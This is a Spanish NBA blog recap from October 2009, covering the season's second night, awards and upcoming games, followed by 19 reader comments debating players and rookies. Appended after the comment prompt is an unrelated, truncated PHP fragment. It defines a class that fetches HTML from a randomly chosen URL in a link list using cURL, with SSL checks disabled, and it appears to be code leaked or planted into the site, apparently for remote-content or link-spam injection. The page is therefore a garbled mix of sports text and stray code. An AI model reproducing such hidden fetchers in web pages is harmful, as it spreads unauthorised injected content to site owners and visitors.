La crónica (28/10/2009)

29 de October de 2009 por txusma

Espectacular 2ª jornada anoche, para calmarnos poquito a poco nuestro terrible síndrome de abstinencia.

Por la zona alta destaca el batacazo tremebundo de los Cavs en Toronto. LeBron, 2º partido y primer triple doble, pero con malos porcentajes que arrastraron al equipo. Muy fuerte constatar que Shaq y compañía no fueron capaces de ofrecer soluciones frente Bosh y Bargnani. ¿Será muy pronto para hacer saltar las alarmas?

Por su parte, los Celtics le dieron un repaso impresionante a los Bobcats. Si Larry Brown valora la defensa anoche disfrutaría con la que le ofreció Rivers. Aunque si se preocupara más por el ataque igual no hubiera registrado un 31% en tiros de dos, un 0% con 0 de 10 en triples y un 52% en tiros libres. Ridículo.

La noticia en Orlando fue el maravilloso regreso de “Chocolate Blanco” a la liga. 15 puntos, 5 asistencias en 23 minutos. La guinda a una actuación colectiva magnífica contra la que nada pudieron hacer los Sixers.

De entre los favoritos, los Spurs también ganaron sólidamente a los Hornets. Hasta 9 tipos rondando las dobles figuras… y curiosamente el peor de la noche fue Jefferson. Otros que asustan.

En la zona media destacamos el partidazo entre los Nuggets y los Jazz en el Pepsi Center con un Carmelo extraordinario. Y a la habitual aportación de Billups se unió anoche un Ty Lawson demoledor, del que muchos ya avisaban. No se notó la ausencia por sanción de JR Smith a pesar del buen partido de los Jazz. Va a molar este duelo durante toda la temporada.

Los Warriors empezaron a la suya… Partidazo de infarto que, como casi siempre, terminaron perdiendo. Por lo visto Ellis tenía razón cuando dijo que jugando junto a Curry podrían sufrir. Brooks y Ariza les hicieron un señor traje. Qué mal les ha sentado el Europeo a Biedrins y Turiaf, Scola les hizo polvo.

También sufrieron de lo lindo los Suns en casa de los Clippers. Como ya avisábamos, Kaman y Camby les hicieron daño del bueno por dentro. Bonito duelo Hill-Butler… pero el que desequilibró fue Nash como en las mejores noches, ganando el partido con entradita marca de la casa. ¡¡¡Qué grande es!!!

Por su parte Atlanta ganó a Indiana, Miami a New York y Detroit a Memphis, donde Iverson sigue lesionado.

En la zona baja, brillaron, y mucho, los Thunder contra Sacramento y los Timberwolves le ganaron la merienda a los Nets por dos puntitos.

De los españoles destacamos a Marc Gasol, el mejor de su equipo (21 puntos y 15 rebotes) aunque perdió. Calderón estuvo correcto (y ganó) pero las malas noticias vuelven a estar relacionadas con Sergio. Sin Udrih, sólo disfrutó de 12 minutos en los que apenas aportó algo positivo.

PREMIOS

MVP: Complicado decidir entre el conjunto de jugadores que cuajaron grandes actuaciones la pasada madrugada. Monta Ellis, Luis Scola, Al Horford, Dwight Howard, Andrea Bargnani o Carmelo Anthony serían los candidatos. Todos piezas claves en las victorias de sus equipos.

Rookie: Se venía diciendo desde hace mucho tiempo que esta generación del draft no tenía mucha calidad pero lo cierto es que hoy han destacado un buen número de rookies: Stephen Curry, Ty Lawson, Omri Casspi, Terrence Williams y Jonhy Flynn parecen con ganas de demostrarles a todos que se equivocaron en sus valoraciones.

Sorpresa: El primer partido de temporada siempre trae consigo una buena cantidad de jugadores que superan nuestras expectativas. Por ejemplo, ¿ quien iba a pensar que Omri Casspi mantendría el acierto que ha mostrado en la pretemporada y anotaría 15 puntos en 19 minutos? ¿O que Danilo Gallinari por fin encontraría su tiro y clavaría 7 triples de 13 intentos? ¿Que Marresse Speights cubriría con gran acierto la mala actuación de Dalembert? ¿Qué jugadores como Rasual Butler, Daequan Cook , Earl Watson o Shelden Williams serían de los más destacados de sus respectivos equipos? El primer día de clase puede marcar el resto del curso…

Decepción: 59 puntos de los Charlotte Bobcats. Puntuación vergonzosa para un equipo de la NBA aunque creo que estaremos de acuerdo en que si los Celtics hubieran metido 57, Larry Brown estaría la mar de satisfecho.

Esfuerzo en vano: Volvió a perder Cleveland y, como está cantado, nuevo premio para Lebron James esta vez con un triple doble. Pero no fue el único que vio como se echaba por la borda su gran actuación:  Marc Gasol, Brook Lopez, Kevin Martin y Danny Granger (un clásico), tampoco se fueron a dormir contentos del todo.

RAZONES PARA TRASNOCHAR

Los jueves, ya se sabe: pocos partidos pero de nivel. El primer jueves de esta regular season recién estrenada nos deparará el debut de los Bulls, que reciben esta noche a la 1h00 a los Spurs. No faltará a la cita Derrick Rose, que viene arrastrando problemas físicos pero jugará, ni tampoco Tony Parker pese al tremendo batacazo que se ha dado esta pasada madrugada y que le ha obligado a retirarse del partido. A continuación, a eso de las 3h30, duelo de aspirantes del Oeste: los Nuggets visitan el lluvioso Oregon, donde esperan unos Blazers sobre los que todos nos hacemos la misma pregunta: ¿seguiremos viendo a Steve Blake de titular por delante de Andre Miller?

Comenta

19 comentarios a esta entrada

  1. TheDeerHunter dice:
    #1

    Lamento apuntar que Monta Ellis no fue clave en ninguna victoria… a todo lo más en la victoria de Houston, aunque no sea su equipo. XD
    Para mí el MVP es sin duda para Carmelo. Actuación bestial con Kirilenko encima y en un partido complicadísimo. Bargnani también estuvo deslumbrante… hay que ver cómo atacaba la canasta anoche. Nada que ver con el “sang d’orxata” que conocíamos.

    De los rookies… me mojaría por Flynn, y el tal Lawson un animalet.

    Y una debilidad… qué pasada Brook López.

      Citar

  2. Queco dice:
    #2

    Yo me vi ayer el partido entero de los Raptors, y la verdad, me gustaron mucho. Todos excepto Jarret Jack, que fue una de las causas por las que los Cavs no se llevaron una paliza de escándalo, aunque al final se entonó algo. La otra razón fueron los árbitros, menudas decisiones extrañas en la segunda mitad, barriendo para cleveland… continuaciones imposibles, faltas en ataque pitadas en defensa, faltas de risa….. en fin, que ni así Lebron pudo ganar, aunque estuvieron cerca.

      Citar

  3. aro_pasado_no_newtoniano dice:
    #3

    En el as pone que Caldrerón pudo con Shaq&Lebron.

    Otra cosa es preguntarse si es necesario preguntarse la utilidad de leer el as.

      Citar

  4. Noelinho dice:
    #4

    Partidazo también del rookie de los Spurs, que buena pinta tiene este Blair!

      Citar

  5. xapa_croack dice:
    #5

    El MVP parece claro para melo.

    Nadie dice nada del partidito de brok lopes.

      Citar

  6. sergio dice:
    #6

    Ayer vi el Utah-Denver y fue un señor partidazo. Carmelo en plan superestrella con esos kilitos de menos de esta temporada y la madurez que parece haber cogido (a ver si no me deja en mal lugar mas adelante), muy bien acompañado por Billups y Lawson. Creo que practicamente todos los jugadores de los que se esperaba algo cumplieron. Quizas Kirilenko no, pero hace tiempo que bajo su rendimiento.

    ORL@PHI: Parece ser que Orlando funciona muy bien hasta cuando Lewis no juega. Curioso que los suplentes de Philly produciesen ayer mas que los titulares. Gran regreso de Jayson Williams pero dudo que siga asi, principalmente porque no lo hacia ni cuando jugaba todos los dias…

    IND@ATL: Partidazo de Horford y Granger, pero el primero esta claramente mejor acompañado en la pista. De hecho Horford no es ni siquiera el mejor de su equipo…Autentico correcalles con altos porcentajes de tiro que se decidio en el ultimo cuarto cuando Atlanta apreto la defensa. Nada extraño. Quizas las 25 perdidas de Atlanta por 1 solo robo.

    CLE@TOR: No vi el partido y, por lo que contais, me arrepiento. Cada vez esta mas claro la LeBron dependencia en este equipo. Nadie a empezado dignamente salvo LeBron. Que absorba tantas responsabilidades no permite a sus compañeros crecerse. La confianza es muy importante para cuando se deciden partidos y eliminatorias

    BOS@CHA: 59-92. Todo dicho. Los refuerzos estan funcionando.

    NYK@MIA: Sorpresas: Gallinari y O’neal los mejores de su equipo?? Me he perdido algo??. Wade en su linea. Beasley haciendo lo que se le supone que puede hacer. Chandler, Lee y Harrington cumpliendo, pero eso no basta en NY.

    DET@MEM: Confirmacion de nuestros peores presagios: 10 asistencias entre 12 jugadores, el dia que funciona Gay no lo hace Mayo, Thabeet no mira a canasta, Gasol es el unico con “testiculina”, nadie hace caso a Conley ni al marcar jugadas,…. Por Detroit todos bien menos el juego interior. Sin sorpresas tampoco.

    NJ@MIN: New Jersey se deja remontar en los ultimos 6 minutos 16 puntos incluido un “clutch” de Wilkins que no esta acostumbrado ni a celebralos. Partidazo de Brook secando incluso a Al Jefferson (doble merito) tirado al garete.Buen partido de Flynn, Harris y ¡Yi Jianlian!

    SAC@OKC: Primer cuarto de +17 y a controlar. Innecesario que Durant y Green jueguen 40 minutos. Sergio jugando poco (nada extraño de nuevo) pero cumpliendo. Quizas esperaba algo mas de James Harden.. habra que darle tiempo.

    NOH@SAS: En NO cumplen los que se suponen de antemano (vease Paul, West y Okafor). San Antonio asusta mucho, muchisimo. Que DeJuan Blair haga un 14-11 en 22 minutos mejorando los numeros de Duncan da mucho que pensar. Como dice Txusma, que Mr Regularidad Jefferson sea el que menos destaque estadisticamente da para pensar del nivel de este equipo.

    HOU@GSW: Me uno a Txusma: “clinic” de Scola en la pintura y Don Nelson tomando nota. Sobredosis de escoltas en San Franciso pero no es nada nuevo.Una pena que Anthony Randolph se pudra en el banquillo y una alegria ver a Brooks repartir 12 asistencias.

    LAC@PHO: Siguen siendo equipos de mas de 100 puntos ambos. Pero claro, la inteligencia de Nash no es la Baron Davis…. Creo que los Clippers deberian jugar mas relajados en ataque e intentar cambiar el “timing” al partido. Tienen unos centers muy buenos defensivamente y con Gordon, Davis, Thornton y Butler son un gran equipo por nombres. Yo probaria de vez en cuando con Griffin de alero (cuando regrese claro)

    P.D: Siento el graaaaan comentario pero tenia ganas de esplayarme… mucho tiempo sin bolita naranja

      Citar

  7. pcerezo dice:
    #7

    Química, química, química…no aparece en los dos primeros partidos de Cleveland…veremos, pero me da que Mike Brown aguanta menos que Pellegrini.

      Citar

  8. TheDeerHunter dice:
    #8

    madre mía que potra la canasta ganadora de Wilkins…

      Citar

  9. CAMPO2 dice:
    #9

    Vale que a Sheed le guste tirar de tres, pero que de 8 tiros de campo los 8 sean de tres me parece un poco fuerte, aunque ayer estaba el dia para que hiciese lo que le de la gana.

      Citar

  10. Love Denise dice:
    #10

    qué bien han comenzado mis Magic, sinceramente, e intentando no dejarme llevar por la amiración que tengo por el equipo del centro de Florida, creo que tienen la mejor plantilla de la NBA,
    Todo el mundo apuesta principalmente por Lakers, Cavs y Celtics, eso es bueno para nosotros, iremos de tapados y al final ganaremos.
    El quinteto de Orlando para mí es igual de bueno que el que pueden tener los ya citados equipos, pero el banquillo es mucho mejor y más profundo el de los Magic.
    J-will, Redick, Barnes, Bass/Anderson, Gortat
    Farmar/Brown, Vujacic/Morrison, Walton, Odom, Powell
    House, Daniels, Tony Allen, Sheed y Davis
    Gibson, Delonte, Moon, Varejao, Powe
    Hill, Mason, Bogans, Haislip/Blair, Ratliff

    Para mí el mejor es el de los Magic

      Citar

  11. Kiki dice:
    #11

    Qué mala bestia DeJuan Blair… no m explico aún cómo no ha sido 1ª ronda (#37), con el nivel del draft de este año (excepto los PG, espectacular), ni siquiera con la excusa de la incógnita de las rodillas. Vaya robo de San Antonio… Eso sí, no me explico porqué no se deciden en serio a llevarse de una vez a Tiago Splitter, a no ser que el que no quiera es él, como Fran Vázquez… No está nada claro, pero es raro. Sería la guinda para los Spurs de esta temporada.

      Citar

  12. TheDeerHunter dice:
    #12

    Opino lo mismo.
    Para mí la plantilla de los Magic es la mejor de todas, aunque del quinteto no estoy tan de acuerdo.
    Sobre todo si se confirma que lo de Jason Williams no es ningún espejismo. Lo único que le ha faltado a este chico es la motivación para ser competitivo. Si la ha encontrado en su año de retiro no lo podemos saber todavía.

      Citar

  13. L.Casei dice:
    #13

    @ Sergio: Blake Griffin de alero ??? (ni su hermano Taylor, casi que tampoco). Por el bien de los Clippers, espero que cuando juegue (sobre finales de diciembre esperemos), lo haga siempre de 4, junto a Kaman o Camby, que por cierto vaya tiritos se está marcando el hombre, flotándole los rivales descaradamente… Mal pinta de nuevo el panorama para LAC, la maldición del Nª1…
    B.Griffin es grande y desequilibrante en la pintura, y a pesar de que mejore su tiro de media distancia, en la vida será un “tres”, y menos con Thornton, Davis o Butler en el equipo.

      Citar

  14. Txusma dice:
    #14

    Vamos a esperar aún un poco para analizar el nivel del draft de este año pq a lo mejor nos llevamos un OWNED todos. De momento hoy han destacado los “secundarios” como Curry, Flynn, Lawson, Casspi y Williams, no lo han hecho mal gente como Blair, Budinger, DeRozan, Ellington o Clark y en teoria los Harden, Evans y Griffin han de tener tb sus buenos momentos esta temporada. Y mañana juega Brandon Jennings al que seguro que no hay que qitar el ojo de encima.

      Citar

  15. sergio dice:
    #15

    @ L.Case: esta clarisimo que su posicion es la de 4 y es en la que se desarrollará como jugador pero como creo que las posiciones altas en los Clippers estan mejor cubiertas que en las de 2 y (especialmente) 3, supongo que PROBARLO en algun momento puede dar resultados positivos. Desde luego no lo vas a poner con un jugador mas rapido que el (estilo LeBron o Igoudala), pero hay bastantes jugadores en esa posicion que no son mas rapidos que el. Por lo que he visto no tiene mal desplazamiento lateral y su potencia fisica es tremenda para alguien de su edad. Si no lo alejan demasiado de la canasta yo lo probaria…. quizas incluso aprenda conceptos de esa posicion que le ayuden en un futuro. El gran pero estaria en la falta de lanzamiento a partir de 5 metros que tiene… pero hay bastantes aleros altos que adolecen de lo mismo.

      Citar

  16. aro_pasado_no_newtoniano dice:
    #16

    Inmensa la única canasta en juego de Calderón.. Entra a Canasta,,y va Lebroncio por detrás para hacerle el gorro,,, y va el tio, se espera, se para y fuerza la personal y canasta. Todo eso para sentenciar el partido.

      Citar

  17. Óscar dice:
    #17

    Bueno, primera derrota en casa de Portland, y vs. al principal rival de División, Denver. (1-1).
    Greg Oden, a falta de 4.6 segundos, tuvo 2 tiros libres con los Blazers uno abajo (94-95). Lo sorprendente habría sido que convirtiese al menos uno de los dos, pero eso no ocurrió. Demasiado tierno en ataque y con demasiada presión y autoexigencia encima. Lo mejor será que se convenza de que es un especialista defensivo espectacular y todo lo que haga en ataque con balón estará bien, sin más. A lo mejor así se suelta y empieza a mostrar lo que apuntaba en Ohio State…
    La derrota no es tan preocupante, aunque sea en casa (en 08/09 el récord en el Rose Garden fué de 34/7 , el 4º mejor de la NBA tras CLE, LAL y BOS). Lo malo que me deja el partido es la incapacidad del equipo a la hora de defender a la estrella rival cuando está en racha, en este caso Carmelo A. (41 puntos). Muchas faltas (30), pero poca chicha… En este aspecto sí es muy importante para mí la baja de BATUM como especialista defensivo titular para desgastar desde el pricipio a aleros rivales como Melo, James, Iguodala, Turkoglu, etc… Webster se encargó de defenderle casi todo el partido, salvo en los últimos (6) minutos, que fué… Roy. Portland no pudo contrarrestar a un rival que atacaba constantemente el aro.
    El otro aspecto a mejorar para los próximos partidos es el del carácter competitivo del equipo frente a rivales iguales o más fuertes, que no sólo se mejora con la llegada de Andre Miller. Los malos porcentajes es un aspecto más coyuntural, pero el 34.6 % FG de anoche es un dato para mirar.
    Lo mejor de nuevo, Rudy: 22 puntazos en casi 23 minutos, con 6/9 en FG y 8/8 en libres… Crack.

    P.D. Yo tampoco veo a B.Griffin de alero (3) ni por asomo. No lo verán nuestros ojos…

      Citar

  18. sergio dice:
    #18

    Que yo tampoco lo veo…. pero Gasol empezo de alero y jugo casi todo el año pasado de pivot… Lebron empezo de pivot y juega hasta de base… es la polivalencia lo que crea grandes jugadores. Ademas, ya jugo en esa posicion alguna vez en su primer año en Oklahoma precisamente para trabajar el tiro y los desplazamientos laterales… y le sirvio mucho para correr la pista

      Citar

  19. Óscar dice:
    #19

    Tampoco vamos a discutir, simplemente yo no creo que vaya a jugar nunca de “tres” en la NBA, aunque puedo equivocarme, por supuesto. Es un jugador efectivamente muy versátil, un físico como muy pocos, con gran movilidad y muchos recursos técnicos, pero por sus características yo no lo veo, a diferencia de Gasol o James (que empezó de “1” y no de pivot en su debut en la NBA, y si no mira el SAC-CLE de 2003, su primer partido, 25p/9as).
    Sería reconvertir a un gran jugador interior en un alero del montón. Su fuerte son los movimientos de espaldas al aro y su intuición para el rebote def/of, y sobre todo la velocidad de ejecución. No sabía que en el primero de sus dos años en Oklahoma había jugado de alero… En los partidos (4 ó 5) que le he visto de esta última temporada jugaba como pivot puro, junto a su hermano Taylor, menos alto y mucho menos potente.
    Lo que estamos deseando Sergio es verlo jugar en la NBA. A ver si llega a tiempo de ser el rookie del año como espera todo el mundo…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>